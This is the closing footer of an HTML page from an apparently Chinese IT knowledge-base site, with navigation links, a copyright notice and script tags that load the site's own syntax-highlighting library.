            <a target="_blank" href="/">首页</a> -
            <a target="_blank" href="/custom/about.htm">关于我们</a> -
            <a target="_blank" href="/search/Java/1.htm">站内搜索</a> -
            <a target="_blank" href="/sitemap.txt">Sitemap</a> -
            <a target="_blank" href="/custom/delete.htm">侵权投诉</a>
        </div>
        <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.
<!--            <a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">京ICP备09083238号</a><br>-->
        </div>
    </div>
</footer>
<!-- 代码高亮 -->
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script>
<link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/>
<script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script>





</body>

</html>